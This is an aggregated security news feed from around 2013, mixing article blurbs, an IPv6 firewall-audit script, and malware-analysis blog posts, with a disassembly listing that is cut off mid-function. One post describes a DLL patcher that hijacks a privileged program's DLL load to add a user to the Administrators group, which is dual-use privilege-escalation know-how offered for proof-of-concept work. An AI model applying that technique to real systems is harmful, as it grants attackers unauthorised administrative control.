http://feeds.pcworld.com/pcworld/blogs/security_alert/ According to a new report from Bit9, a security vendor with a focus on defending against advanced persistent threats (APT), there is a one in four chance that downloading an Android app from the official Google Play market could put you at risk. Bit9 analyzed 400,000 or so apps in Google Play, and found over 100,000 it considers to be on the shady side. Does that mean that the sky is falling, and everyone with an Android smartphone or tablet should abandon it immediately? No. The research by Bit9 illustrates some issues with app development in general, and should raise awareness among mobile users to exercise some discretion when downloading and installing apps, but it's not a sign of any urgent crisis affecting Android apps. Use discretion rather than blindly granting permissions to apps. The report from Bit9 isn't about apps that contain malware, or are even overtly malicious for that matter. Bit9 reviewed the permissions requested by the apps, and examined the security and privacy implications of granting those permissions. The reality is that many apps request permission to access sensitive content they have no actual need for. Bit9 says that 72 percent of all Android apps in the Google Play market request access to at least one potentially risky permission. For example, 42 percent request access to GPS location data, 31 percent want access to phone number and phone call history, and 26 percent ask for permission to access personal information. Bit9 discovered 285 apps that use 25 or more system permissions.

==> Bad outsourcing decisions cause 63% of data breaches

http://feeds.pheedo.com/tt/1323 Bad outsourcing decisions caused nearly two-thirds of the data breaches investigated by security firm Trustwave in the past year.

==> Cyber attacks on trust could cost top firms $398m, says Ponemon

http://feeds.pheedo.com/tt/1323 Every Global 2000 organisation faces $398m in potential losses from new and evolving attacks on their ability to control trust with cryptographic keys and digital certificates, a study has revealed.

==> Audits and compliance requirements for cloud computing

http://feeds.pheedo.com/tt/1323 Even as India Inc experiments with the cloud, security concerns play spoilsport. These cloud computing audit and compliance tips will make your journey easier.

==> Cutwail botnet spam campaign tied to Zeus banking Trojan

http://feeds.pheedo.com/tt/1323 The cybercriminals connected to the notorious Zeus Trojan are using the Cutwail botnet to distribute spam designed to steal account credentials.

==> PCI validation: Requirements for merchants covered by PCI DSS

http://feeds.pheedo.com/tt/1323 Mike Chapple details the PCI validation requirements for merchants covered by PCI DSS.

==> VoIP security strategy helps WNS tackle cross-party risk

http://feeds.pheedo.com/tt/1323 Indian BPO major WNS ensures robust risk management and PCI-DSS compliance through a simple VoIP security solution, despite outdated client infrastructure.

==> Analysis: Windows 8 security features improve on Windows 7 security

http://feeds.pheedo.com/tt/1323 Expert Michael Cobb says Windows 8's security features, like Windows Defender and Secure Boot, are a step forward for desktop and BYOD security.

==> Study finds spear phishing at heart of most targeted attacks

http://feeds.pheedo.com/tt/1323 Malicious file attachments are typically used as the payload, according to a report issued this week by Trend Micro.

==> Security business analyst – a role whose time has come

http://feeds.pheedo.com/tt/1323 For effective information security, India Inc requires security business analysts. These should be people who understand security, technology and the business.

==> Mitigate phishing attacks in the cloud: A how-to

http://feeds.pheedo.com/tt/1323 As Indian enterprises increasingly move to the cloud, so are phishing attempts. Here are some ways to mitigate the risks of phishing in the cloud.

==> Study finds most antivirus products ineffective

http://feeds.pheedo.com/tt/1323 Slow updates to signature databases cause some antivirus products to be ineffective against known threats, according to a study by security firm Imperva.

==> Zenmap tutorial: Mapping networks using Zenmap profiles

http://feeds.pheedo.com/tt/1323 Video: In this Zenmap tutorial screencast, Keith Barker of CBT Nuggets explains how to efficiently map networks graphically using Zenmap profiles.

==> Combat social engineering attacks with these mantras

http://feeds.pheedo.com/tt/1323 Of all the security threats, those involving the human angle are perhaps the deadliest. Keep social engineering at bay with these tips.

==> Phishing attack, stolen credentials sparked South Carolina breach

http://feeds.pheedo.com/tt/1323 A phishing attack and stolen credentials gave an attacker access to the systems of the South Carolina Department of Revenue for two months.

==> Cloud security begins with the contract, says expert

http://feeds.pheedo.com/tt/1323 Enterprises must empower their legal teams to ask the right questions and write contracts based on risk management, explains Tom Kellermann of Trend Micro.

==> Deception, proactive defenses can better protect IP, says expert

http://feeds.pheedo.com/tt/1323 Deceptive environments and phony data in the enterprise can fool attackers and increase the cost of hacking, says noted cybersecurity expert Paul Kurtz.

==> After antimalware: Moving toward endpoint antivirus alternatives

http://feeds.pheedo.com/tt/1323 Is it time to "cut the cord" with endpoint antimalware? Matthew Pascucci discusses possible antivirus alternatives.

==> PCI Council: Risk assessment methodology unique to company environment

http://feeds.pheedo.com/tt/1323 The PCI Risk Assessment Special Interest Group concludes that risk assessments are based on a company's unique risk tolerance and environment.

==> NASA to deploy whole-disk encryption following breach

http://feeds.pheedo.com/tt/1323 The stolen laptop contained sensitive data on a large number of employees and contractors. The information was not encrypted.

==> Google Says the FBI Is Secretly Spying on Some of Its Customers

http://feeds.wired.com/wired27b The terrorists apparently would win if Google told you the exact number of times the Federal Bureau of Investigation invoked a secret process to extract data about the media giant's customers. That's why it is

==> FBI Investigating Unidentified Drone Spotted Near JFK Airport

http://feeds.wired.com/wired27b The Federal Bureau of Investigation said Tuesday it is investigating an unidentified black drone an Alitalia pilot said he encountered while approaching John F. Kennedy International Airport. Whether it was a hobbyist breaking the Federal Aviation Administration's

==> Alleged Drug Dealer at Center of Supreme Court GPS Case Wins Mistrial

http://feeds.wired.com/wired27b The alleged drug dealer who was at the center of the Supreme Court's landmark GPS tracking case had a mistrial declared Monday in his retrial after District of Columbia jurors said they were hopelessly

==> White House, FCC Chairman Support Legalizing Unlocking of Mobile Phones

http://feeds.wired.com/wired27b The President Barack Obama administration said Monday that it made "common sense" for Americans to legally have the power to unlock their mobile phones, so they could use them on a compatible carrier of choice

==> Evernote Hack Exposes User Data, Forces Extensive Password Resets

http://feeds.wired.com/wired27b Evernote has discovered and blocked suspicious activity on the Evernote network that appears to have been a coordinated attempt to access secure areas of the Evernote Service, according to a statement posted on the

==> Feds Say Man Deserved Arrest Because Jacket Said ‘Occupy Everything’

http://feeds.wired.com/wired27b A Florida man deserved to be arrested inside the Supreme Court building last year for wearing a jacket painted with "Occupy Everything," and is lucky he was only apprehended on unlawful entry charges, the

==> Cablevision to Suspend Repeat Copyright Scofflaws, Comcast to Hijack Browsers

http://feeds.wired.com/wired27b Comcast is to begin hijacking browsers of its internet subscribers who are detected repeatedly infringing on public file-sharing networks, while Cablevision Systems said it would suspend subscribers for 24

==> Bradley Manning Takes ‘Full Responsibility’ for Giving WikiLeaks Huge Government Data Trove

http://feeds.wired.com/wired27b Updated 4:08 p.m. FORT MEADE, Md. — Wearing his Army dress uniform, a composed, intense and articulate Pfc. Bradley Manning took “full responsibility” Thursday for providing the anti-secrecy organization WikiLeaks with a trove of classified and sensitive military,

==> Supreme Court Thwarts Challenge to Warrantless Surveillance

http://feeds.wired.com/wired27b The divided Supreme Court halted Tuesday a legal challenge to a once-secret warrantless surveillance project that gobbles up Americans' electronic communications, a program that Congress eventually legalized in 2008

==> I Totally Owned Your Grandma…

http://hellnbak.wordpress.com/feed/ This was originally written by me and posted here as a guest blog: http://www.zdnet.com/blog/feeds/i-totally-owned-your-grandma-aka-social-networks-as-attack-platforms/2838 ========================================= Guest editorial by Steve Manzuik Lately there has been a lot of attention given to various privacy issues of social networking sites. Whether it is Google's Buzz automatically adding anyone you have ever emailed to your follow list or the [...]

==> Now for Something Completely Different

http://hellnbak.wordpress.com/feed/ Apologies to those who follow this blog just for my security geek content. But this time I am posting something completely different. For the three years I have lived in the bay area I have been partially a San Jose Sharks hockey fan as well as a Calgary Flames fan. I have taken all kinds [...]

==> Backpeddled But Still Very Wrong

http://hellnbak.wordpress.com/feed/ I guess all of the attention that the mindless blog post by eEye created has caused them to backpeddle quite a bit. Sadly Morey is still way off the mark and if anything just made it more clear that he is attempting to use this as a reason you should buy their product and not use the [...]

==> How The Mighty Have Fallen

http://hellnbak.wordpress.com/feed/ Full Disclosure: I am a former eEye employee and managed their now pretty much dead Research Department. Something of which, after reading this post, I can honestly say I am embarrassed to admit. This is a classic case of the insane taking over the asylum. This morning a friend of mine pointed out this blog [...]

==> Apparently Time Has Reversed – Not The Disclosure Debate Again?!?

http://hellnbak.wordpress.com/feed/ Remember back in 2001 when researchers were compared to Terrorists and the term “Information Anarchy” was coined? You can read this blast from the past here –> http://www.windowsitpro.com/article/windows-client/information-anarchy-the-blame-game-.aspx As the saying goes, those who do not learn from history are doomed to repeat it, or something like that we have this clueless blog post over [...]

==> Murder – Just Like In The Video Games

http://hellnbak.wordpress.com/feed/ By now I am sure most of you have seen the “Collateral Murder” video that was released via Wikileaks. I do not want to get involved with the arm chair debates over what should or should not have happened. I have no real military experience to speak of unless being chased off a Canadian base [...]

==> Creepy GMail “Feature”

http://hellnbak.wordpress.com/feed/ I stumbled upon this creepy GMail “feature” the other day. Basically, it appears that there is some logic that notices when you type the phrase “see the attached” and then checks for a file attachment alerting you if you fail to attach a file. With all the privacy concerns around GMail I found this to [...]

==> Nexus-1 Honeymoon is Over

http://hellnbak.wordpress.com/feed/ As many of my friends know, I am very hard on my electronics. My laptops, my MP3 players, my cell phones and even the TV remote all get abused in various ways. So, in typical bleep fashion, over the weekend I dropped my Nexus-1 phone and sadly, even though it wasn't a far fall - a couple [...]

==> Clueless FUD Article…

http://hellnbak.wordpress.com/feed/ I haven't blogged anything of good use lately so I thought I would start up again by calling out this completely useless and incorrect opinion piece. On the Dark Reading blog an article appeared entitled "Share – Or Keep Getting Pwned". Sigh. Clearly zero research was done into this posting as there really is a lot of [...]

==> Week 9 in Review – 2013

http://infosecevents.net/feed/ Event Related Juniper Networks intros global cloud-based ‘attacker database’ – zdnet.com At the start of RSA 2013, Juniper Networks is rolling out a global database to track attacks on individual devices. MASTIFF Analysis of APT1 – novainfosec.com At Shmoocon this year we were pleased to find that there is a project focused on this specifically [...]

==> Information Security Events For March

http://infosecevents.net/feed/ Here are information security events in North America this month: Metricon (Conjunction with RSA) : March 1, 2013 in San Francisco USA BSides Vancouver 2013 : March 4 to 5 in Vancouver, BC, Canada CanSecWest 2013 : March 6 to 8 in Vancouver, British Columbia AtlSecCon 2013 : March [...]

==> Week 8 in Review – 2013

http://infosecevents.net/feed/ Event Related ShmooCon Firetalks 2013 – irongeek.com These are the videos I have for the ShmooCon Firetalks 2013. Resources APT 1 APT 1: Exposing One of China’s Cyber Espionage Units – intelreport.mandiant.com APT1: Exposing One of China’s Cyber Espionage Units Threat Actors Using Mandiant APT1 Report as a Spear Phishing Lure: The Nitty Gritty – [...]

==> Week 7 in Review – 2013

http://infosecevents.net/feed/ Event Related S4x13 Video: Atlas on RF Comms Security and Insecurity – digitalbond.com RF Comms are often ignored in SCADA assessments. Big mistake as atlas 0f d00m shows RF hacking session at S4x13. #Shmoocon Presentation Links – mainframed767.tumblr.com So I talked fast and furious and ran out of time, but 20 minutes is not a [...]

==> Week 6 in Review – 2013

http://infosecevents.net/feed/ Resources “Security Engineering” now available free online – lightbluetouchpaper.org I'm delighted to announce that my book Security Engineering: A Guide to Building Dependable Distributed Systems is now available free online in its entirety. You may download any or all of the chapters from the book's web page. The Anatomy of Unsecure Configuration: Reality Bites [...]

==> Week 5 in Review – 2013

http://infosecevents.net/feed/ Event Related Pentest & Reverse: iOS Application Hacking – esec-pentest.sogeti.com Last month, we gave some lectures about iOS application Hacking first at GreHack (Grenoble, France) and then at Hack.Lu (Luxembourg, Luxembourg). Here you will find the slides and the paper. Don’t hesitate to send us your questions. Resources The Red team Mindset Course Part 1 [...]

==> Information Security Events For February

http://infosecevents.net/feed/ Here are information security events in North America this month: ShmooCon 2013 : February 15 to 17 in Washington, District of Columbia USA ACM Conference on Data and Application Security and Privacy (CODASPY) : February 18 to 20 in San Antonio, TX, USA BSides Boston : February 23 in Cambridge, MA [...]

==> Week 4 in Review – 2013

http://infosecevents.net/feed/ Event Related University Courses on Reverse Engineering and Malware Analysis – f-secure.com Today marks the commencement of the first lecture for our spring 2013 semester Reverse Engineering Malware course for the Aalto University (Espoo campus) in Finland. Resources Security Assessment of Blackberry Applications – resources.infosecinstitute.com Development of mobile applications has picked up really fast in [...]

==> Week 3 in Review – 2013

http://infosecevents.net/feed/ Event Related Offensive Defense – blog.ioactive.com I presented before the holiday break at Seattle B-Sides on a topic I called “Offensive Defense.” This blog will summarize the talk. I feel it’s relevant to share due to the recent discussions on desktop antivirus software (AV) [1], [2],[4], [3] Resources Red October The “Red October” Campaign – [...]

==> Week 2 in Review – 2013

http://infosecevents.net/feed/ Event Related Index of Congress 29c3 – ftp.ccc.de High quality mp4 of 29c3. The ‘Hack Back’ Offense – bankinfosecurity.com To repel the onslaught of cyberattacks against organizations, security leaders are debating the merits of the “hack back” defense. THREADS – trailofbits.com THREADS is an annual conference that focuses on pragmatic security research and new discoveries [...]

==> The blog has moved…

http://infosecramblings.wordpress.com/feed/ After much thought and consideration, I decided to move my blog from wordpress.com to my own domain. The decision has nothing to do with the service provided by wordpress.com. I have never had any problems with this blog while it has been hosted by wordpress.com. There are other things I want to do with the [...]

==> Interesting Information Security Bits for 11/07/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Virtualization: How to Isolate Application Traffic Lori has penned a nice article pointing out how we can use VLANs to isolate application traffic. She makes an excellent point in the article, “we’ve grown to [...]

==> Interesting Information Security Bits for 11/06/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. TaoSecurity: Defining Security Event Correlation Richard has a good post up on defining security event correlation. Go check it out. Why use Firefox << Techdulla Techdulla tells us why he uses Firefox for his [...]

==> Interesting Information Security Bits for 11/05/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. CSI Stick – So who has a copy of your phone? << SANS Computer Forensics, Investigation, and Response This is both very cool and very scary. Tool that allows you to quickly and easily [...]

==> Interesting Information Security Bits for 11/04/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. /dev/random >> Blog Archive >> Critical dns2tcp Vulnerability! Looks like dns2tcp has a vulnerability that needs to be taken care of. Time to upgrade. TrueCrypt – Free Open-Source On-The-Fly Disk Encryption Software for Windows [...]

==> Resources to increase your info security knowledge and benefit your infosec career…

http://infosecramblings.wordpress.com/feed/ @GeekGrrl posted a note on her blog asking this question: 1) How would you recommend getting started on a career toward Network Security/Network Pen Tester? She has some follow-up questions to that first one requesting some specific information. Go read her post and then come back. . . . . Okay, here is what I [...]

==> Who needs employee exit procedures and disaster recovery plans are for whimps…

http://infosecramblings.wordpress.com/feed/ This article talks about the conviction of Pryavrat Patel for actions he took after his long-term contract employment with Pratt-Read was terminated. Now, what Mr. Patel did was definitely wrong, but frankly, Pratt-Read should probably put some thought into how they dealt with the situation too. It took them two weeks to recover from the [...]

==> Recap: RSA Europe 2008 Day 2

http://infosecramblings.wordpress.com/feed/ Hello again. Day 2 of RSA Europe 2008 was a busy one. I attended several sessions during the day and then the Security Catalyst, Security Bloggers, Security Twits get together happened that evening. This post will only talk about the day. The meet-up post will be later. Without further ado, let’s get to it. ‘The [...]

==> Recap: RSA Europe 2008 Day 1

http://infosecramblings.wordpress.com/feed/ Hi there folks. I am home and somewhat rested from my trip to London for the RSA Europe 2008 conference. It was a great trip and I enjoyed the conference. Below is a recap of my first day. This is going to be long, so hang in there Information Security: From Ineffective to Innovative Arthur [...]

==> March 2013 OUCH! - Social Networking Safely http://www.securingthehuman.org/resources/newsletters/ouch/2013#march2013, (Wed, Mar 6th)

http://isc.sans.org/rssfeed_full.xml Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form -- Adam Swanger, Web Developer (GWEB, GWAPT) Internet Storm Center https://isc.sans.edu (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Wednesday, March 6th 2013 http://isc.sans.edu/podcastdetail.html?id=3166, (Wed, Mar 6th)

http://isc.sans.org/rssfeed_full.xml

==> IPv6 Focus Month: Device Defaults, (Tue, Mar 5th)

http://isc.sans.org/rssfeed_full.xml IPv6 deployment in this part of the planet is not very advanced. Whilst companies and telcos realise that the end, so to speak, is nigh for IPv4, uptake is rather slow, in AU at least. Telcos are however quickly addressing this, and no doubt a number of them are close to enabling IPv6 to your gateway, if they haven't already. This brings me to my favourite devices, firewalls.

During a bunch of security reviews over the last year or so we typically spend a little time looking at the IPv6 setups and requirements in the organisations. We certainly found that people quite readily state they have no IPv6 in their environment; however, when they RDP, SSH or otherwise connect to a more recent version of (insert your favourite OS here), the connection is often most definitely IPv6. When you then look at firewall configurations you often find nice-looking IPv4 rules to control traffic and a less than ideal default for IPv6: ANY, ANY, ANY permit. So does that mean that when your telco enables IPv6 to your gateway, traffic can leave? Potentially yes. It does depend on a number of other factors, but the core of it is that people do not realise they may be leaking. Even if traffic to the internet is restricted, what about other network segments? In a PCI DSS pentest, connectivity via IPv4: nope, nicely segmented. IPv6: please come through, full access.

Another thing to remember with firewalls is that IPv6 is relatively new to them as well. So maybe you need to check whether your product supports IPv6 and, if the answer is yes, to what extent. What about the other devices in the network, your switches and routers: will their current, or even latest, OS support your IPv6 requirements? Printers, multifunction devices etc., do they support it? Do they have defaults that really do not help you out from a security perspective?

For today that is what I would like to hear from you. What devices have you come across that have interesting IPv6 defaults? Maybe they don't support it fully. Maybe they just get it wrong. One firewall a few years ago (fixed now) did IPv6 to IPv4 translation a bit differently and mangled the IPv4 packets that resulted. So what are your IPv6 "watch out for this" tips? Mark
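The mismatch described above, on a Linux host, is an IPv4 ruleset with a DROP policy next to an ip6tables ruleset that was never touched. The following is an added example, not part of the ISC diary: it parses iptables-save and ip6tables-save output and reports built-in chains that are closed for IPv4 but still default to ACCEPT for IPv6. The three dumps embedded in it are constructed for the example, and the hardened ruleset carries the one caveat that trips people up when they copy IPv4 rules across: ICMPv6 has to stay open (RFC 4890 lists the types), or neighbour discovery breaks.

```python
"""Spot the 'IPv4 is filtered, IPv6 is ANY/ANY/ANY permit' mismatch on a Linux host.
Added example; the iptables-save / ip6tables-save dumps below are constructed,
not taken from any real host. Run it without arguments on a box to audit the live
rulesets (needs root for the *-save tools)."""
import re

IPTABLES_SAVE_V4 = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""

# What ip6tables-save typically shows on a host nobody configured: policy ACCEPT, no rules.
IP6TABLES_SAVE_DEFAULT = """\
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
COMMIT
"""

# Mirrors the v4 policy. ICMPv6 must stay open (at least the RFC 4890 types),
# otherwise neighbour discovery fails and the host drops off the v6 network.
IP6TABLES_SAVE_HARDENED = """\
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p ipv6-icmp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
COMMIT
"""

POLICY_RE = re.compile(r"^:(\S+)\s+(ACCEPT|DROP|REJECT|-)\s")
RULE_RE = re.compile(r"^-A\s+(\S+)\s+(.*)$")
TERMINAL = ("DROP", "REJECT")
BUILTIN = ("INPUT", "FORWARD")   # OUTPUT is often open on purpose; audit it separately


def parse_filter_table(dump):
    """{chain: {"policy": str, "rules": [str]}} for the *filter table of an
    iptables-save style dump. Other tables (nat, mangle, raw) are skipped."""
    chains, in_filter = {}, False
    for line in dump.splitlines():
        line = line.strip()
        if line.startswith("*"):
            in_filter = (line == "*filter")
            continue
        if not in_filter or not line or line == "COMMIT" or line.startswith("#"):
            continue
        m = POLICY_RE.match(line)
        if m:
            chains[m.group(1)] = {"policy": m.group(2), "rules": []}
            continue
        m = RULE_RE.match(line)
        if m:
            chains.setdefault(m.group(1), {"policy": "-", "rules": []})["rules"].append(m.group(2))
    return chains


def effective_default(chain):
    """Fate of a packet no rule matched: the chain policy, unless an unconditional
    '-j DROP' / '-j REJECT' rule closes the chain first."""
    if chain is None:
        return "ACCEPT"            # chain absent from the dump: the kernel default is ACCEPT
    for rule in chain["rules"]:
        tokens = rule.split()
        if len(tokens) >= 2 and tokens[0] == "-j" and tokens[1] in TERMINAL:
            return tokens[1]
    return chain["policy"]


def audit(v4_dump, v6_dump):
    """Findings for built-in chains that are closed for IPv4 but wide open for IPv6."""
    v4, v6 = parse_filter_table(v4_dump), parse_filter_table(v6_dump)
    findings = []
    for name in BUILTIN:
        d4, d6 = effective_default(v4.get(name)), effective_default(v6.get(name))
        if d4 in TERMINAL and d6 == "ACCEPT":
            nrules = len(v6[name]["rules"]) if name in v6 else 0
            findings.append("%s: IPv4 default %s but IPv6 default ACCEPT (%d IPv6 rules)"
                            % (name, d4, nrules))
    return findings


if __name__ == "__main__":
    import subprocess
    v4 = subprocess.run(["iptables-save"], capture_output=True, text=True).stdout
    v6 = subprocess.run(["ip6tables-save"], capture_output=True, text=True).stdout
    print("\n".join(audit(v4, v6)) or "no IPv4/IPv6 policy mismatch in the filter table")
```

An empty ip6tables-save (the ip6_tables module never loaded) is treated the same as policy ACCEPT, because that is what the kernel does with it. The check only looks at the filter table and at unconditional terminating rules; a chain "closed" by a conditional rule still shows up as open, which is the conservative direction for an audit.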

==> ISC StormCast for Tuesday, March 5th 2013 http://isc.sans.edu/podcastdetail.html?id=3163, (Tue, Mar 5th)

http://isc.sans.org/rssfeed_full.xml

==> Java 6u43 update #YAJU http://www.oracle.com/technetwork/java/javase/6u43-relnotes-1915290.html, (Tue, Mar 5th)

http://isc.sans.org/rssfeed_full.xml Richard Porter --- ISC Handler on Duty

==> Google Chrome Stable Channel Update v25.0.1364.152 http://googlechromereleases.blogspot.com/2013/03/stable-channel-update_4.html, (Mon, Mar 4th)

http://isc.sans.org/rssfeed_full.xml Richard Porter --- ISC Handler on Duty

==> Java 7u17 update #YAJU http://www.oracle.com/technetwork/java/javase/7u17-relnotes-1915289.html, (Mon, Mar 4th)

http://isc.sans.org/rssfeed_full.xml Richard Porter --- ISC Handler on Duty

==> Elevation of Privilege DLL Patcher

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In the course of security consulting, I often find myself in a situation where I've identified a security vulnerability but I need to create a proof-of-concept to show the feasibility of the vulnerability's exploitability. Recently, I found an elevation-of-privilege vulnerability in which an application that runs as a privileged user loads a DLL from a location that is writeable by an unprivileged attacker. An unprivileged attacker could write a malicious DLL to this location, and when loaded by the given application, the DLL's code would execute in the context of a privileged user. Ideally, we'd like the "malicious" DLL to have all the functionality of the DLL that the application expected to load, including the same exported functions. In other words, what I really wanted was an easy way to patch an existing DLL to inject my "malicious" code to run before the DLL's original DllMain code was executed, after which the original DllMain code would be called and the DLL would continue to operate as normal. Unfortunately, I know of no programs like this that patch DLLs on disk, so I made my own. The program attached to this blog post redirects a given DLL's entrypoint (which originally pointed to DllMain) to point to code that has been patched in to the DLL. This patched in code will add a given user to the Administrators group in Windows (assuming that it's being run in the context of a privileged user), after which it will transfer control back to the DLL's original DllMain. The patcher also updates the Import Table for the DLL since the patched in code relies on the function NetLocalGroupAddMembers(...) from netapi32.dll. The only other side effect of the patcher is that it clears the Bound Imports for the DLL; the only adverse side effect of this is that this may cause the DLL to take a few extra milliseconds to load. The patcher is compatible with both 32-bit and 64-bit DLLs. 
You can run the patcher executable without command line arguments for usage instructions. This is version 1.0, so please e-mail me if you

==> Counting Lines of Source Code

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I'm reviewing the source code for a rather large project this week and I wanted to update my Facebook status by saying something like, "Jason is reviewing 100,000 lines of Java for security vulnerabilities." However, being the perfectionist that I am, I wanted to give the real number of lines of code. I wasn't aware of any built-in functionality in Visual Studio to do this, and after three minutes of Googling, I found a lot of Visual Studio plugins that could do this but unfortunately I didn't find any instructions on how to do this with just plain Visual Studio. And honestly, I didn't want to install a plugin (see http://blogs.msdn.com/oldnewthing/archive/2006/03/22/558007.aspx :) I figured I could whip up a short C# program to do this, but even that seemed a little over-kill for such a simple task. Then I realized I could do this from a standard console window command prompt:

    cmd /v:on
    set lines=0
    for /r %a in (*.java) do (
        find /v /c "" "%a" > %temp%\temp.txt
        for /f "tokens=6" %b in (%temp%\temp.txt) do (set /a lines += %b)
    )
    echo %lines%

(find /v /c "" prints one line per file of the form "---------- PATH: COUNT", and the inner for /f picks the count out of that line.) The "tokens=6" part is specific to the source code directory structure for this particular project, and if any of the source code subdirectories contained spaces, you'd have to tweak the code above a little. But hey, it worked out quite nicely, and it was a much cleaner solution than installing a plugin. And I'm sure there's an even shorter/simpler way to do this from a standard command prompt than with what I have above. Feel free to post cleaner "solutions" :) (BTW, the actual number of lines turned out to be 348,523... that should keep me busy for a while.)

==> Investigating Outlook's Single-Instance Restriction (PART 2)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Please see PART 1. While the return value of FindWindowA is used to determine whether or not Outlook terminates its process, there's another issue when it comes to using a separate profile. Outlook calls MAPILogonEx without the MAPI_NEW_SESSION bit set. This causes Outlook to try to use an existing MAPI session if it can find one. Because of this, Outlook doesn't present the user with the option to choose a different profile in the second instance of Outlook; it will instead just use the profile that the first instance is using. (Why I didn't hit this issue in PART 1 is not clear.) As such, to fully overcome Outlook's single-instance limitation, it is necessary to spoof the return value of the FindWindowA call in PART 1 and to set the MAPI_NEW_SESSION bit in the flFlags argument passed to MAPILogonEx.

==> Loading Drivers in OllyDbg

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx In a previous post, I talked about changing the Subsystem field in the IMAGE_OPTIONAL_HEADER to trick OllyDbg into loading a driver for the purpose of unpacking. However, making this single change is often not enough to be able to load the driver as an EXE in OllyDbg. From my experience (in other words, I haven't verified this in the Windows source code and I'm not speaking authoritatively here), executable files need to have NTDLL.DLL in their Import Table or have another DLL in their Import Table that will eventually cause NTDLL.DLL to get loaded. I was looking at a driver today that only had NTOSKRNL.EXE and HAL.DLL in its Import Table. The former causes BOOTVID.DLL and KDCOM.DLL to get loaded as well, however nowhere in the import chain does NTDLL.DLL get loaded. Because of this, OllyDbg can't get the driver up and running after we make the Subsystem change. To solve this problem, we can add NTDLL.DLL (or anything that imports NTDLL.DLL, like KERNEL32.DLL) to the Import Table of the driver and OllyDbg will then be able to load the driver as a new process.

==> Function Analysis

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx While analyzing a malware sample today, I came across an interesting function. It uses red-herring local variables and red-herring global variables, and even once you get rid of that code, it's still unclear as to what the function does. Since you don't have access to the callers of this function, I'll tell you this:

* The first argument is a null-terminated ASCII string.
* The second argument is a null-terminated ASCII string.
* The third argument is an integer.

Your challenge? Tell me what the function does. Your prize? You get to choose the name of the next malware family that I name. Stipulations:

* Cannot refer to the name of a person, place, or time.
* Cannot refer to anything obscene or offensive.
* Cannot be found in a dictionary or web-search.
* Cannot use bleep-casing for compounding words -- must begin with one uppercase letter and end with all lowercase letters.
* Must be a "generic" name (for example, shouldn't contain the word "bot" or "worm", since I have no idea what class of malware I'll end up naming next).
* Must be humanly pronounceable.
* Must be between four and eight letters in length.
* I have final discretion over the name in case you think of something "bad" that isn't covered by one of the rules above.

The winner is the first person to post a comment that correctly and fully describes in high-level English (not in code) what the function does. And in case you think I'm "hiring cheap labor" to analyze this for me, I'll pull a Raymond Chen and say that the MD5 of my analysis is F2F3648B9BE371B4682B728A7A3D920F. Once the correct answer is posted, I'll post my analysis which hashes to that MD5.
Here's the function:

sub_0 proc near
var_10 = dword ptr -10h
var_C  = dword ptr -0Ch
var_8  = dword ptr -8
var_4  = dword ptr -4
arg_0  = dword ptr 8
arg_4  = dword ptr 0Ch
arg_8  = dword ptr 10h
    push    ebp
    mov     ebp, esp
    sub     esp, 10h
    push    ebx
    push    esi
    push    edi
    mov     esi, [ebp+arg_4]
    mov     [ebp+var_8], 697A259Dh
    xor     [ebp+var_8], 182Ch
    inc     dword ptr ds:42C094h
    and     [ebp+var_C], 0
    and     [ebp+var_4], 0
    jmp     short loc_94
; -----------------------------------------------------------------------
loc_2A:                                 ; CODE XREF: sub_0+A6j
    xor     ebx, ebx
    add     [ebp+var_8], 3AA5h
    inc     dword ptr ds:42C094h
    xor     edi, edi
    jmp     short loc_81
; -----------------------------------------------------------------------
loc_3D:                                 ; CODE XREF: sub_0+8Fj
    mov     eax, [ebp+var_4]
    add     eax, edi
    mov     edx, [ebp+arg_0]
    movsx   eax, byte ptr [edx+eax]
    movsx   edx, byte ptr [esi+edi]
    cmp     eax, edx
    jnz     short loc_52
    inc     ebx
loc_52:                                 ; CODE XREF: sub_0+4Fj
    mov     ecx, esi
    or      eax, 0FFFFFFFFh
loc_57:                                 ; CODE XREF: sub_0+5Cj
    inc     eax
    cmp     byte ptr [ecx+eax], 0
    jnz     short loc_57
    cmp     ebx, eax
    jnz     short loc_72
    inc     [ebp+var_C]
    mov     eax, [ebp+arg_8]
    cmp     [ebp+var_C], eax
    jnz     short loc_72
    mov     eax, [ebp+var_4]
    jmp     short loc_C0
; -----------------------------------------------------------------------
loc_72:                                 ; CODE XREF: sub_0+60j ; sub_0+6Bj
    mov     eax, 43C9h
    mul     [ebp+var_8]
    mov     [ebp+var_10], eax
    mov     [ebp+var_8], eax
    inc     edi
loc_81:                                 ; CODE XREF: sub_0+3Bj
    mov     ecx, esi
    or      eax, 0FFFFFFFFh
loc_86:                                 ; CODE XREF: sub_0+8Bj
    inc     eax
    cmp     byte ptr [ecx+eax], 0
    jnz     short loc_86
    cmp     edi, eax
    jb      short loc_3D
    inc     [ebp+var_4]
loc_94:                                 ; CODE XREF: sub_0+28j
    mov     eax, [ebp+arg_0]
    mov     ecx, eax
    or      eax, 0FFFFFFFFh
loc_9C:                                 ; CODE XREF: sub_0+A1j
    inc     eax
